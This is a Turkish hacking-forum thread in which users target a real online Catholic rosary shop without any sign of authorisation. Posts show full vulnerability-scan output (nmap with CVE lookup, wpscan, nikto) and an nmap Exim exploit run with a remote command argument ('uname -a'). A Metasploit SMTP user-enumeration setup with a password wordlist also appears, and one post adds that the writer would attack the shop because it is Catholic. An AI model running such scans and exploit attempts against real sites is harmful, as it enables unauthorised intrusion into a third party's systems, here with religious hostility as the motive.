- 20 Şub 2019
- 15
- 0
Selam bir katolik mağazası buldum, sql açıklarına bakarken ama sql açığı Syntax olmadığı için yararlanamadım size bu sitenin açığı varmıdır test edermisiniz? Ave Maria Rosaries | Catholic rosary
Sızma Testleri Katolik Mağazası Mevcut - Nasıl Shellerim.
- Konbuyu başlatan Lime Fox
- Başlangıç tarihi
yarm saate kalmaz tum bilgi ve aciklarin burada yazacaqim
bazi bilgiler zafiyyet aciklar portlar felan nmap ciktisi
wpscan bilgisi
nikto sorusdurmasi ve cikdisi
acik portlar dmitry sorquulamasi
25 ci portta zafiyyet aciki arsdirmasi kontroller nmap kontrolu asagidaki gibidir
ve diyer parametrenin denenmesi sonucu asagidaki gibidir
mettasploitten 25 ci port sizma islemleri wordtxt ye gore asagidaki parametrelerden olsyor
bazi bilgiler zafiyyet aciklar portlar felan nmap ciktisi
Kod:
nmap -sV --script freevulnsearch avemariarosaries.com
Kod:
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-18 15:55 EDT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.20% done; ETC: 15:58 (0:02:45 remaining)
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 9.00% done; ETC: 15:55 (0:00:30 remaining)
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 14.55% done; ETC: 15:55 (0:00:23 remaining)
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 20.80% done; ETC: 15:55 (0:00:15 remaining)
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 92.31% done; ETC: 15:56 (0:00:01 remaining)
Nmap scan report for avemariarosaries.com (144.208.79.223)
Host is up (0.29s latency).
rDNS record for 144.208.79.223: ecbiz224.inmotionhosting.com
Not shown: 957 filtered ports, 30 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
25/tcp open smtp Exim smtpd 4.92
| freevulnsearch:
| CVE-2019-13917 Critical 10.0 https://cve.circl.lu/cve/CVE-2019-13917
|_ *CVE found with NMAP-CPE: (cpe:/a:exim:exim:4.92)
80/tcp open http Apache httpd (PHP 7.2.19)
|_http-server-header: Apache
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache
465/tcp open ssl/smtp Exim smtpd 4.92
| freevulnsearch:
| CVE-2019-13917 Critical 10.0 https://cve.circl.lu/cve/CVE-2019-13917
|_ *CVE found with NMAP-CPE: (cpe:/a:exim:exim:4.92)
587/tcp open smtp Exim smtpd 4.92
| freevulnsearch:
| CVE-2019-13917 Critical 10.0 https://cve.circl.lu/cve/CVE-2019-13917
|_ *CVE found with NMAP-CPE: (cpe:/a:exim:exim:4.92)
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
2222/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| freevulnsearch:
| CVE-2018-15919 Medium 5.0 https://cve.circl.lu/cve/CVE-2018-15919
| CVE-2017-15906 Medium 5.0 https://cve.circl.lu/cve/CVE-2017-15906
|_ *CVE found with NMAP-CPE: (cpe:/a:openbsd:openssh:7.4)
3306/tcp open mysql MySQL 5.5.5-10.2.25-MariaDB-log
| freevulnsearch:
| CVE-2014-6520 Medium 4.0 https://cve.circl.lu/cve/CVE-2014-6520
| CVE-2014-4260 Medium 5.5 https://cve.circl.lu/cve/CVE-2014-4260
| CVE-2014-4258 Medium 6.5 https://cve.circl.lu/cve/CVE-2014-4258
| CVE-2014-4243 Low 2.8 https://cve.circl.lu/cve/CVE-2014-4243
| CVE-2014-2440 Medium 5.1 https://cve.circl.lu/cve/CVE-2014-2440
| CVE-2014-2438 Low 3.5 https://cve.circl.lu/cve/CVE-2014-2438
| CVE-2014-2436 Medium 6.0 https://cve.circl.lu/cve/CVE-2014-2436
| CVE-2014-2432 Low 2.8 https://cve.circl.lu/cve/CVE-2014-2432
| CVE-2014-2431 Low 2.6 https://cve.circl.lu/cve/CVE-2014-2431
| CVE-2014-2430 Low 3.5 https://cve.circl.lu/cve/CVE-2014-2430
| CVE-2014-2419 Medium 4.0 https://cve.circl.lu/cve/CVE-2014-2419
| CVE-2014-0437 Low 3.5 https://cve.circl.lu/cve/CVE-2014-0437
| CVE-2014-0420 Low 2.8 https://cve.circl.lu/cve/CVE-2014-0420
| CVE-2014-0412 Medium 4.0 https://cve.circl.lu/cve/CVE-2014-0412
| CVE-2014-0402 Medium 4.0 https://cve.circl.lu/cve/CVE-2014-0402
| CVE-2014-0401 Medium 4.0 https://cve.circl.lu/cve/CVE-2014-0401
| CVE-2014-0393 Low 3.3 https://cve.circl.lu/cve/CVE-2014-0393
| CVE-2014-0386 Medium 4.0 https://cve.circl.lu/cve/CVE-2014-0386
| CVE-2014-0384 Medium 4.0 https://cve.circl.lu/cve/CVE-2014-0384
| CVE-2014-0001 High 7.5 https://cve.circl.lu/cve/CVE-2014-0001
| CVE-2013-5908 Low 2.6 https://cve.circl.lu/cve/CVE-2013-5908
| CVE-2013-5891 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-5891
| CVE-2013-3812 Low 3.5 https://cve.circl.lu/cve/CVE-2013-3812
| CVE-2013-3809 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-3809
| CVE-2013-3808 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-3808
| CVE-2013-3805 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-3805
| CVE-2013-3804 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-3804
| CVE-2013-3802 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-3802
| CVE-2013-3801 Medium 5.0 https://cve.circl.lu/cve/CVE-2013-3801
| CVE-2013-3794 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-3794
| CVE-2013-3793 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-3793
| CVE-2013-3783 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-3783
| CVE-2013-2392 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-2392
| CVE-2013-2391 Low 3.0 https://cve.circl.lu/cve/CVE-2013-2391
| CVE-2013-2389 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-2389
| CVE-2013-2378 Medium 6.0 https://cve.circl.lu/cve/CVE-2013-2378
| CVE-2013-2376 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-2376
| CVE-2013-1555 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-1555
| CVE-2013-1552 Medium 6.0 https://cve.circl.lu/cve/CVE-2013-1552
| CVE-2013-1523 Medium 4.6 https://cve.circl.lu/cve/CVE-2013-1523
| CVE-2013-1521 Medium 6.5 https://cve.circl.lu/cve/CVE-2013-1521
| CVE-2013-1512 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-1512
| CVE-2013-1511 Low 3.5 https://cve.circl.lu/cve/CVE-2013-1511
| CVE-2013-1506 Low 2.8 https://cve.circl.lu/cve/CVE-2013-1506
| CVE-2013-1502 Low 1.5 https://cve.circl.lu/cve/CVE-2013-1502
| CVE-2013-1492 High 7.5 https://cve.circl.lu/cve/CVE-2013-1492
| CVE-2013-0389 Medium 6.8 https://cve.circl.lu/cve/CVE-2013-0389
| CVE-2013-0386 Medium 6.8 https://cve.circl.lu/cve/CVE-2013-0386
| CVE-2013-0385 Medium 6.6 https://cve.circl.lu/cve/CVE-2013-0385
| CVE-2013-0384 Medium 6.8 https://cve.circl.lu/cve/CVE-2013-0384
| CVE-2013-0383 Medium 4.3 https://cve.circl.lu/cve/CVE-2013-0383
| CVE-2013-0371 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-0371
| CVE-2013-0368 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-0368
| CVE-2013-0367 Medium 4.0 https://cve.circl.lu/cve/CVE-2013-0367
| CVE-2012-5096 Low 3.5 https://cve.circl.lu/cve/CVE-2012-5096
| CVE-2012-5060 Medium 6.8 https://cve.circl.lu/cve/CVE-2012-5060
| CVE-2012-3197 Low 3.5 https://cve.circl.lu/cve/CVE-2012-3197
| CVE-2012-3180 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-3180
| CVE-2012-3177 Medium 6.8 https://cve.circl.lu/cve/CVE-2012-3177
| CVE-2012-3173 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-3173
| CVE-2012-3166 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-3166
| CVE-2012-3163 Critical 9.0 https://cve.circl.lu/cve/CVE-2012-3163
| CVE-2012-3160 Low 2.1 https://cve.circl.lu/cve/CVE-2012-3160
| CVE-2012-3158 High 7.5 https://cve.circl.lu/cve/CVE-2012-3158
| CVE-2012-3156 Low 3.5 https://cve.circl.lu/cve/CVE-2012-3156
| CVE-2012-3150 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-3150
| CVE-2012-3149 Low 3.5 https://cve.circl.lu/cve/CVE-2012-3149
| CVE-2012-3147 Medium 6.4 https://cve.circl.lu/cve/CVE-2012-3147
| CVE-2012-3144 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-3144
| CVE-2012-2750 Critical 10.0 https://cve.circl.lu/cve/CVE-2012-2750
| CVE-2012-2749 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-2749
| CVE-2012-2102 Low 3.5 https://cve.circl.lu/cve/CVE-2012-2102
| CVE-2012-1757 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-1757
| CVE-2012-1735 Medium 6.8 https://cve.circl.lu/cve/CVE-2012-1735
| CVE-2012-1734 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-1734
| CVE-2012-1705 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-1705
| CVE-2012-1703 Medium 6.8 https://cve.circl.lu/cve/CVE-2012-1703
| CVE-2012-1702 Medium 5.0 https://cve.circl.lu/cve/CVE-2012-1702
| CVE-2012-1697 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-1697
| CVE-2012-1696 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-1696
| CVE-2012-1690 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-1690
| CVE-2012-1689 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-1689
| CVE-2012-1688 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-1688
| CVE-2012-0882 High 7.5 https://cve.circl.lu/cve/CVE-2012-0882
| CVE-2012-0583 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-0583
| CVE-2012-0578 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-0578
| CVE-2012-0574 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-0574
| CVE-2012-0572 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-0572
| CVE-2012-0553 High 7.5 https://cve.circl.lu/cve/CVE-2012-0553
| CVE-2012-0540 Medium 4.0 https://cve.circl.lu/cve/CVE-2012-0540
| CVE-2011-2262 Medium 5.0 https://cve.circl.lu/cve/CVE-2011-2262
| CVE-2010-3839 Medium 4.0 https://cve.circl.lu/cve/CVE-2010-3839
| CVE-2010-3838 Medium 4.0 https://cve.circl.lu/cve/CVE-2010-3838
| CVE-2010-3837 Medium 4.0 https://cve.circl.lu/cve/CVE-2010-3837
| CVE-2010-3836 Medium 4.0 https://cve.circl.lu/cve/CVE-2010-3836
| CVE-2010-3835 Medium 4.0 https://cve.circl.lu/cve/CVE-2010-3835
| CVE-2010-3834 Medium 4.0 https://cve.circl.lu/cve/CVE-2010-3834
| CVE-2010-3833 Medium 5.0 https://cve.circl.lu/cve/CVE-2010-3833
| *No CVE found with NMAP-CPE: (cpe:/a:mysql:mysql:5.5.5-10.2.25-mariadb-log)
|_ *CVE found with freevulnsearch function: (cpe:/a:mysql:mysql:5.5.5)
5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6
| freevulnsearch:
| CVE-2019-9193 Critical 9.0 https://cve.circl.lu/cve/CVE-2019-9193
| CVE-2019-10130 Medium 4.0 https://cve.circl.lu/cve/CVE-2019-10130
| CVE-2018-16850 High 7.5 https://cve.circl.lu/cve/CVE-2018-16850
| CVE-2018-1115 Medium 6.4 https://cve.circl.lu/cve/CVE-2018-1115
| CVE-2018-10925 Medium 5.5 https://cve.circl.lu/cve/CVE-2018-10925
| CVE-2018-10915 Medium 6.0 https://cve.circl.lu/cve/CVE-2018-10915
| CVE-2018-1058 Medium 6.5 https://cve.circl.lu/cve/CVE-2018-1058
| CVE-2018-1053 Low 3.3 https://cve.circl.lu/cve/CVE-2018-1053
| CVE-2017-7548 Medium 4.0 https://cve.circl.lu/cve/CVE-2017-7548
| CVE-2017-7547 Medium 4.0 https://cve.circl.lu/cve/CVE-2017-7547
| CVE-2017-7546 High 7.5 https://cve.circl.lu/cve/CVE-2017-7546
| CVE-2017-7486 Medium 5.0 https://cve.circl.lu/cve/CVE-2017-7486
| CVE-2017-7485 Medium 4.3 https://cve.circl.lu/cve/CVE-2017-7485
| CVE-2017-7484 Medium 5.0 https://cve.circl.lu/cve/CVE-2017-7484
| CVE-2017-15099 Medium 4.0 https://cve.circl.lu/cve/CVE-2017-15099
| CVE-2017-15098 Medium 5.5 https://cve.circl.lu/cve/CVE-2017-15098
| CVE-2017-12172 High 7.2 https://cve.circl.lu/cve/CVE-2017-12172
|_ *CVE found with NMAP-CPE: (cpe:/a:postgresql:postgresql:9.6)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.35 seconds
Kod:
[+] URL: http://www.avemariarosaries.com/
[+] Started: Sun Aug 18 15:57:41 2019
Interesting Finding(s):
[+] http://www.avemariarosaries.com/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
Kod:
erver: Apache
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.3.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /images/: Directory indexing found.
+ Entry '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /store_images/: Directory indexing found.
+ Entry '/store_images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
Kod:
Port State
21/tcp open
25/tcp open
80/tcp open
110/tcp open
143/tcp open
Kod:
nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 www.avemariarosaries.com
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-18 16:29 EDT
Nmap scan report for www.avemariarosaries.com (144.208.79.223)
Host is up (0.23s latency).
rDNS record for 144.208.79.223: ecbiz224.inmotionhosting.com
PORT STATE SERVICE
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
465/tcp open smtps
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
587/tcp open submission
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
Kod:
nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587 www.avemariarosaries.com
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-18 16:31 EDT
Nmap scan report for www.avemariarosaries.com (144.208.79.223)
Host is up (0.22s latency).
rDNS record for 144.208.79.223: ecbiz224.inmotionhosting.com
PORT STATE SERVICE
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
465/tcp open smtps
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
587/tcp open submission
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLEmettasploitten 25 ci port sizma islemleri wordtxt ye gore asagidaki parametrelerden olsyor
Kod:
[COLOR=#13c16a]use auxiliary/scanner/smtp/smtp_enum[/COLOR]
[COLOR=#13c16a]set RHOSTS [URL="http://www.avemariarosaries.com/"]Ave Maria Rosaries | Catholic rosary[/URL]
[/COLOR]set USER_FILE /root/Desktop.wordlistsifreihtimali.txt
run
Moderatör tarafında düzenlendi:
- 20 Şub 2019
- 15
- 0
Sırf katolik olduğu için uğraşsam buna kendi emeklerim ile saldırırdım.
